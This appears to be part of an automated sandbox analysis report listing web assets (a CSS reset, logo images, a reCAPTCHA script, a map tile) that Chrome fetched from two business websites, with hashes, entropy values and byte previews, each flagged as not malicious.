                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/css/reset.css
                                              Preview:/*--..reset.--*/ .html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td{border:none;outline:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;text-decoration:none;margin:0;padding:0;}.table{border-collapse:separate;border-spacing:0}.blockquote:before,blockquote:after,q:before,q:after{content:""}.*{margin:0;padding:0;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}.article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section {display: block; }........ .ol, ul { list-style: none;}.blockquote, q { quotes: none;}.:focus { outline: 0;}.table { border-collapse: collapse; border-spacing: 0;}.img { border: 0; -ms-interpolation-mode: bicubic; vertical-align: middle; }.a{t
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4411
                                              Entropy (8bit):7.823584799722165
                                              Encrypted:false
                                              SSDEEP:96:i2pruOfed11JV1k5TQ/esyhJYmwVgauOstLp2QEVY1naF2:DruOWTo2/3yhyxc2HMaF2
                                              MD5:2EC9B069D98A49888506A37124DC03AA
                                              SHA1:7C0FB0D8385BC08EF8AF41D494CAD824F57F2B42
                                              SHA-256:001E793747B2ADCBBA36F437AB561F9FBF8D53A337D50E419BFAF34C088A887B
                                              SHA-512:D8BE17C5A164B1914CD687A693E7ABDD89AB5BB60FCA2BB5B142BB4B5F60C5D21F4F26637B1A6351D0C0712D3CA7DC82EFF831A5C7302CA3D6C77DB7BDA76FD4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/1.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)" xmpMM:InstanceID="xmp.iid:36708763F94811EC965CCA07EE966920" xmpMM:DocumentID="xmp.did:36708764F94811EC965CCA07EE966920"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:36708761F94811EC965CCA07EE966920" stRef:documentID="xmp.did:36708762F94811EC965CCA07EE966920"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?> ......IDATx....UU....b....""....*h....JM..a.. (. .@P .J......0>.H..E($%.jPP.Q..A.......w..9..s......o...~....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):83836
                                              Entropy (8bit):7.997290805659413
                                              Encrypted:true
                                              SSDEEP:1536:ogm0K6KgxAKO1BqJTMxX0qBz6dHFqdEVCQfxV6onxIup+dOYGYbz0VqXIudPK:oNqKgx/BM+gWlOXQfzFodnz7XIudS
                                              MD5:5E9DF5C6B4B5E19BA894605F2999AC96
                                              SHA1:D82FD5225004FF56D5A0FBD748F94122D6C1C5D2
                                              SHA-256:5ED8A37A5FD400417AC7B0FE2EBB11AF28553E9D4C795A711FED95F921736B3C
                                              SHA-512:E0CBF108224847EA788E08755BB242E43CD9231B80644AEB98A5813DEED566A9EBF0F53A337E338B610D76389083F0AD0A80E4BF8B044BE265BFE02D7ABEBED4
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFtG..WEBPVP8X..............VP8 .G..PZ...*....>.l.Q.%...v.s...bn..;i... ...5.....7yq..EE...........s...<.s.........{....z.....f.g...|...)O{.y.#......a....}N.................y...:...(.....!...9.....c...>........=....?...............e...W....V...................w...........<....q....Q.....u.......=..,...N..#>:.84U.x ...L.'.G5.....IE.(.@..G.9..lCb)...j.FXE.....o.ft.`.`.H5.....-Mn..&.9s...[5.C..i...G.J..;...s'h...k....'.) .....94..IF46......Z.d.......c>.u.%...Q...].V......!.s......C..X@.B...'.>i.[U..d.'7..._..iU.-.C.U..&.q.6&u.\..:..N.b=L3<..b...2...(...`90...Fi.6n.j.."M..=.u.Oz.rcLK...4..Y...I2o..e.!.;.F\...{7n.\..."A.{-L^..ts...X.:eR..b.2...F..8.........I....B.4&..R;)....n?r........m.` ..Dy..q.'[w..l....|.a..l~)_R...V..S.....ot.Wf.....1..,..m....F..V..Kd.._._qb.8..7......q..../|..PR....|..c...9......:.A...u.........k....7.>o.W. .?.."..MK.#..E.E....^.]..V.T.XY.H*.......*8`b..\>.%r........D$.b.:..BC^...50A.n.Cz..d.........,.l..95......"md...{...k.....F.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):18615
                                              Entropy (8bit):7.770220822660111
                                              Encrypted:false
                                              SSDEEP:384:4YNg7PWem03q7qUfT755Ploqt8vCVKYSW8rQUpq:4YyzT2mUf/55tV8qMYZOpq
                                              MD5:34D38F9969AD7BF9DD28863A69E542E7
                                              SHA1:F768A4540B1BF57AE9C3D907C64FA0792DD2F13A
                                              SHA-256:8C2455D8B7AA7DCA09AB51D2EF56D230023BEB21340D25055AB40A272D2AAB7D
                                              SHA-512:88BCB0194691E07EEEF559CC4E64D60DA03193CEFDAD877E06412951ACF5DC83BB53785140D43FEC61A6D6CDFE427663AEC669F87E3B075784C0BB552B9325A1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/59/7fe4372f500d5576d0b3c96940740596.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3099
                                              Entropy (8bit):7.920956092412081
                                              Encrypted:false
                                              SSDEEP:96:b7lJmvDfj4rWMAv7V0CyaxxUvoUoWQcA3:b7lJejj4rWMG7GCzQi/3
                                              MD5:CFAEDFDA908CD0722A403A04FBDED558
                                              SHA1:84E70B87349439C6D660693094ABCF74A655DBB3
                                              SHA-256:A8EDB9C3BEDAB47BFC29B6D3002FBDE4D6785CC63039CF240D50B072B0DE0818
                                              SHA-512:55348AD5DDC5A84891E52EA51F123A5949D668834429E921A89770D09EF1FBA18C0EB16A9607082D37AA1CEECA9DE3B0CE7BD36058A65402F0644019AE129EF5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/opencart.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...~PLTE.........(.............................&...........#........................../..q...........W..A..................F........6..u...XIDATh...z.:...Fd..V.w.....o.h......G1..,...v.F..h.m...Ul[......~.X.W... &...a.z.-d......-..bc.!..".....3..w:..1._..ar.l..../..Nw....0n.Z...qc...R..u.I.m..7..t&.....m...B....aT....p.~...-2.....d4.4...E....Z..t..I...U41.{..B.Y...>.Xu.l.>h.b.0..K.*...h{..2i...~.U`X..(.2.9....X..@.9.#.g..^.5.....v...z..C..a.j.7.|.!.X0..vX)......-......2....C.(.......b.;.{....m.@[!\.....d.p...|....,&....QU......Q.bQ[...... :d]t...Czn.K7...eY..F.W........L~.a.[1.h.[..^.......<Lq.+..b..J-K..N../.o..d.....O..EW...V...f..........8e_C...v.....vyS..4....P...T...?B....o.G..io./M.K<./.....2... ....K _S.............v..@..F/u.|."G.L../....`.....pH....t<.9*q....4p..`R._....:.VJl.`.d.l ...V=...............r!^1C=.0..P.2.t.....g.0M.X.......S...=6..O]Q...$Go..........~W..&.t/...4.m.oS.....T.....\.y..+F......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7767
                                              Entropy (8bit):7.958721094201888
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4waMKIOIPRa4NHhuR7I0FUGJ3rmbII:K0wSIOIPRNPuzUa3rq7
                                              MD5:F109EAC3FB18A77513C246B6D515DD70
                                              SHA1:F7C9C2AD5F4105C09C2ABB894EB3665102E601AA
                                              SHA-256:341640B23F2D92C7807D9DB258BA2FCE0CDBAED844F84381F09E630BA6D67F78
                                              SHA-512:14D4CCE628CAE517134D7DA3B5C6B39C621C3A79B63A315BC3CB2B7CEB0A9D280320167CB75C1FA9DEA141DB557DD0C31AEED32A1350C664983685FEB87879ED
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/21.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):11000
                                              Entropy (8bit):7.9603650478314645
                                              Encrypted:false
                                              SSDEEP:192:OllZQTrIUDriALhGQtzvHDhQXhVzMh9c7oYTpYW9cQ9DWhT6JaF1:OvYriALltzbhQMhmtFvNo/
                                              MD5:C08A9DD91A226B9972DF432D7B556BC4
                                              SHA1:C308BC63CA2877D21BEDCFA4535F2D019F339E63
                                              SHA-256:16333368EE482FAC88E6961A88D031011F70838C033AFB0A30C7D9B0C2BA5971
                                              SHA-512:3919ED84806941B7152B5FB5B083F3963E4E7638FDBBE282FCAE202591E42CE52C031106A5C6FDD16875A77B22237677E2EDFA83A6856E7EACF6E8C65EA0DBAF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/18.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:D86C9B45D7D111ED9532E4B2CAEF69B1" xmpMM:DocumentID="xmp.did:D86C9B46D7D111ED9532E4B2CAEF69B1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D86C9B43D7D111ED9532E4B2CAEF69B1" stRef:documentID="xmp.did:D86C9B44D7D111ED9532E4B2CAEF69B1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.?...'hIDATx..].|TU..&3.LK.@.J..JUW,.U)"......!UXQA.Q@z[..".H.A."....dZ.I&e...{'...u....n...}o....w.wnS....}..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1434), with no line terminators
                                              Category:downloaded
                                              Size (bytes):1434
                                              Entropy (8bit):5.782287307315429
                                              Encrypted:false
                                              SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtw1aWDAQosLc:VKEctKo7LmvtUjPKtX7S1aiRLrwUnG
                                              MD5:E7F4945A3458503BDEE0AD9476537604
                                              SHA1:CD049E2F8F9D05ABC087BBEF7EFEDA01EFB0F3A6
                                              SHA-256:8AB3BC08E25F6A7E24EF75EE66ED06360BCEEACE487D22822D7724B3F2BBED50
                                              SHA-512:BD30B50396E0015B723FFD185972E37094A5CFF4A42CB5AE5D439AE3B85F2735F33145B363E2657AC174D66ED2E3F97FC0C2BFC9FDEE6B06C61E5A01FD1CFF34
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/recaptcha/api.js
                                              Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5892
                                              Entropy (8bit):7.929494619119123
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/x3DFhR0/Vwjfa3t6seWvaC1xar1ds0t3:UIIHUCD4wapFU/qe9r5L0q0t3
                                              MD5:F67AC47301AA0AC0217EC408BFFE7192
                                              SHA1:B501BB510E64070ED3127BB34FB1CDF414FA11CA
                                              SHA-256:C17DB79446B156B79A100A79F82D76695D48A3AB5B6070B9FF755E275E241090
                                              SHA-512:6B5A36F66954E0489DE8AEADFC56E7A4954D698E92AE22EDEB6C95BA850867A28374B5820FC15AFD82925325114A3DCD5817719DFA09DF6A58CF736A7388525A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3215
                                              Entropy (8bit):7.921420679215034
                                              Encrypted:false
                                              SSDEEP:96:4O1WPBFjHcIJd8G3rLcIIZuFJwXswV70xn19Pjn:Ra3J2G3rLsuFJwt4DPr
                                              MD5:17902C7B2E56CF2F04B7B177E508E29C
                                              SHA1:43FEF846D205EEF612F6841B5E213D86CE10C103
                                              SHA-256:DCCEF19A8074112D2A7046A1D125B3B19ED474A2062D2E717EB1E8B52467DDB8
                                              SHA-512:A04299FC2D7039477E69BFA414237ABCF293359A536AED3E1006465563D4835128BDEB9F9E1C94D1109CB2A463E83F4595E707FB3FE8A5771CAA27F672DC3D31
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......!3a..\.......1_...................(N.$W.,X*<k..c...!3g....0U....#....#6['8e..............C7/....1l......J5.U^xQ/.H97.......*^@1-X5...../..{....I....|y8+'....8%......L*.............er.........................0!....8Gn.-- '@B#.qvv........QC>...EQh......th.......2GFTx{......!....."...23I...........6.bGZMH..Y...9?[......c>).......O...........dr....Z....jfd....3..q.}ie..3.d.....|....T[.oB}..Z....IDATh...O......m.........I.......'.U..$.8P..........Z.O..k...s_..J.8......@....~o5q.+IR ..f..........'...0..o.........=Ol..../N.^G...w.y....._..x.}O /....JJ..._.|.s....b...l.^.~3..,N`\F.8..0.,.-....l..$.O....y...+.....s......(.H$"~.....'*.p.A..BD...!...&W.....v.T..q.Y.*...*\1.3..g=...pD..+..)+.m......a....@E.z.........-.g.!@...ES...........).wvv..8..a..i..bs.&.%.._1.Z:..........~...To.1........./...*b.K..V.t.k..G..W....>~L.w.p....`......|.lr.........O..>}.j..l.......q.......^.S.....X,...66.cK.Te...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):25256
                                              Entropy (8bit):7.990785391299864
                                              Encrypted:true
                                              SSDEEP:768:L3D4g3E5NXIarin9VOsHjpgUwb6lG2OfZ/TKPkq:L35E0jOsjSU6IQfluk
                                              MD5:717096AA0224BEA5D0881FBA3FAA9ADE
                                              SHA1:447ACFB774351966E441022D3D9CEF37755245BA
                                              SHA-256:F6CEA7238CA5E9357BD16AFE28393E0DA7385CA20DB45229701887E42CD405E4
                                              SHA-512:FDA37BEBFEAFFBCD9C7A4BB96C4F81853799F414F173DC6C2089EEC62EB0BC6F7C20BF92D0E1B796FB2EE19855C4B3AC8368D203D7AC2F42DFC9E093C04A6BCA
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.b..WEBPVP8 .b.......*....>m4.H$".+.rZ.p..gn..i'....T..O./..............?A..~.zQ......._....`=..6.|..........'.......Oh..=....}..........g.?*7.........?.?......../N..t....}......_...v?..W...z.y..W..?.}...._...c..._.O..u?s...u.....S.T...aV.j...[...6.lv...U...aV.j...[...6.lv...U...aV.j...[...6.lv...U...aV.j...[.....~.g...|rZR......=.:n.1SR...bn.%.D.zD..........vl&k..c..(/.9<woWl.t.z.G.<..?zR..W.....y..]...w....i./.}.)..!T....L{..M.../...m...w...CK....zI.m@.. o.....b.M..d....<..1D...2......x?.i.5|..9...R@.m.N._..?.{.,.H.|.X._...?./B.)....`W..k...M...Z...........cF..n.;f..5..w.....;...E.7......b.P...d......e..Qp.)...c.....e.....K......b.kb...;Lg.......'l.xz..E,..A.qd..".mB"{.|V"\....w...7.f..=f_.....<.H...93.6X..C.Au.(q//.U.0-.c....n....=j..D4..q0.&a.JO.3..)....A.h).}.E....s.....v.\.z.P.....hz..kZ.on........%...F.+..U..., ......3#k..0.$..&aJD=....r..-.U..^..a.7.>..?)l-eD.K..r.g,L...sY.k..s8...p..L||..D..n<....>.|.G.k.8;..!...9..a`..G...p.u
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):12702
                                              Entropy (8bit):7.976867931273701
                                              Encrypted:false
                                              SSDEEP:384:ZOHnGIpzhlsCuMlp0MPe7qDPRG9ZEZ/SyV:gnFzhKcpbPqqDaEZKI
                                              MD5:FB7E6B7192944B7AD6D8E6FE39760073
                                              SHA1:CAB9496110D35F94270E86FF2149877AD95F6CC4
                                              SHA-256:F44417781200FD5BF70BA6C1FB6B08F78D9286A6DDC50AD72DD69FDEFC82B1A0
                                              SHA-512:E5874C5635B3CD82DAD7E90802F6297B5BAAE3102C12455390732DE917940661713BE6B9AAD873C28F910EEC3A774AF152EE0CA169B41B31E1A5B76F8A84DE98
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21414!3i14014!4i256!2m3!1e0!2sm!3i707457461!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=88503
                                              Preview:RIFF.1..WEBPVP8L.1../..?...$E..-..k=8_....8..}....@.`w.......p..R.wq. .../."j t.zm..&i...b....bE .........7....T.q.1J......!6H.. ..?..f.0+.T...4...6.C..p.>.......gv.(..r2sZ.po..].f.#=#..r.r.r.t.i!.9..G..@4....y.D..@4....G4.#.7.3+.r....9..F..n%.J..if....3.k>/8...$9.l[G..lT.E!...Z>.`c...R...p...............;.m..N.AD.E_.....lt..."..6,..d....y..;....j..UU..>0........"..CP\0d..Y2..}....(.x...2.c.|q..m.f...5..AXe.9?...'._..../W...q.>x>......{N....z.~]r.A....=-.k.../?...4..B-%M..?R.p=;...........l*../......Yq.............a..8..Z......?f..~....O...pu>=...WL..}.>...wD..c,........h,.#...%,1\k.o.~q8..z.............Vk~.e....|R....C<c...WL,G....P...Y......nYi.....*U@B..0..P.YH.U .......+|b7....<..........$*{......R....T ..W...pq..:q......~.5*..=.j2.8.~s..._..~.R.K.G.*@..7H...j#.k..=V!+n..:.k.....`.3...$........r..u6....bv.<.....9..~..*.g....E......4..Fw.....l.*..tD..l........[...&..Y3...Y.t...$_x....SZ.n..{.~y..'.C..K1zV>.."&l..w...W..v..R..O|....{.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 600 x 400, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):25930
                                              Entropy (8bit):7.963106067492998
                                              Encrypted:false
                                              SSDEEP:384:I982UV5w3TPxTBubEvHCq6TOEFMrlcozOdbrwEj4zxK5JhF691OC6mHbTuBAwrj:WUCTRBuUf9EOr2UIbrwE+KPh0n6evwrj
                                              MD5:B6BE501EBF5622EA9D2C40002447DA02
                                              SHA1:D2639AEC2764BA3750724A53052E7E79BA0042D7
                                              SHA-256:4FDD0EE3D32154986F87326012D9CC2F143101854D630EDED1C811E6EF0F6CBA
                                              SHA-512:2ACDD78A5BCA5A19769D2089DBE19DB97E6E020B6B1D9B2CF49BF40B73F06411CF6D0240E23418EED0C677EDDC5F13F4068D3A81547FF7786E7DAD321D3FCC9D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/service/Web_Mobile_App.png
                                              Preview:.PNG........IHDR...X.........E......PLTELiq.................................CA@xz....!!!.......ppv...))).........100............"! ............XRP...............efjxx}.............zb..qJ:LB1...cS....Tiy?..pI, ..f...F4?.E6....tRNS...&....../@...{.g.H.$.....pHYs............... .IDATx...{.8..{.{.w..3...>...N..$$....w.d..HB...I......;O.J%.....O..O..O..O..O..O..O........^.YO}....,B.n'......3..:..z\..C....oi.buNz..f}J....e.....}..,\.>..?;.....o....Q...S..=...e{-Q.J..^..K......C.z.\}..4..o..Y.......p.boP..`mX.6~.m...=...... .^.U....bi.h."..}.[.(.'Y.i.q.*..h..F..............cb.......L.N.7..I...\..6..6H.?;|.-....9.q..6....5...>.X{...........RM".1c.|...~.ub;..g.....5.......6..'..m....G|.s.......L.\.6..._.h{......m......'.....M......q.g...#..P..7{?...zd.{l~.............w...19z.pb.}..\........G(.s......o.N...g./.<..0......v>..iw....l...'ZG..4..u..R..hg.p........M.}.Y...$.fN.6S.y.N:.....q\_.........f.......=....t..O.....X.y.....b.....\..7w...g
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):223930
                                              Entropy (8bit):7.998914685909954
                                              Encrypted:true
                                              SSDEEP:6144:WpsSxeTjUndQaUa5D2QB2KmTRCqAEv3tzylBkj4hV:WsWId8D2Amjftu44hV
                                              MD5:BE6722FC9A6DC5464FF0E7BFF5F2E694
                                              SHA1:814556AC33912C7BDAE94B687F319CCE6C8D96BD
                                              SHA-256:23967C123155ACFDF997A9BA6F25CF7F9043D2A4F349EDD50FAA779216E37DFA
                                              SHA-512:862DEB981CE4EE2A4D68DB87D1769AD6C0E1EEE369436B0D1036DC05BAA7AF9766C12076F4E90EB6DB19DEC7730C01B5900A0798A51D8B18753864BDEE1364B7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/6/d1cf623cfda2ed689fc6281afcfa75de.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 ,...0Q...*....>a$.E$"!.|6.@........|...v5........q...../......g.?./....../.......{.....~.~........?|.....;.....?.=....7.......|.._.?.W...?...~..Q}'......d.fv...............?......w.C......]._........Q........?................~....g...o.....~p...G......._._...?....o.....o...?.~......y............................|.~.....z...gG;@...Z.;`R$....c..pT.....'.S..........z......3....2._..(..~..!..s..W.(..,Z@.....p......e'dH.:L......Y..wo6.c..zU.l.....l~D...g]G.>....74...+.u.L.B.F cAi...}......5.g.7..G{.E...f...w....u.x..vl.j^>]....Mg..N..`....JMf...&L4.....M.V.9.$.O.._.!..o..."....n..D.|.......ni[......qi._...z....Mo...9!...@.;.>s.6-.}||U...I)*4....!..Oe..`...c.._3.../jZ....w....$....]...}6...b'*..8:.M2r...VZx-.......8...I.{..?<9.v.V....i;.w..KN.\..<S.@.>*3|.k..{..5...m.c.A..7..............t.2...........J..ah$Jx.[2$.$..~......z....D..9....g..Q..\ZW......x..sd......YR.Mk...D.+...p.~......i.....A..]T...X~.D:......C..W.4..!.@
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3391)
                                              Category:dropped
                                              Size (bytes):68468
                                              Entropy (8bit):5.597063427359037
                                              Encrypted:false
                                              SSDEEP:768:tSx+1QK2AEU2AEWWHZjyDD+Y66riwUyb+/8Fo6aM9dFDZvKa:YOEfgq/8ea
                                              MD5:853383CEE0C7AD876D409ADCDE0D12E3
                                              SHA1:3F633067AFB665F5B2621625E4836F44F24FC5DF
                                              SHA-256:86FB08163A30352733E67B1B7A107818CCC4C8B632D914421AB84075D6A17730
                                              SHA-512:4516945D51B81FB447AB18212F3C7051989738CADA658CCC54C8459E630978B5767C7793FE8517FB89E573DE814759E8B27EC1F88933C65E672DDF9F043C1156
                                              Malicious:false
                                              Reputation:low
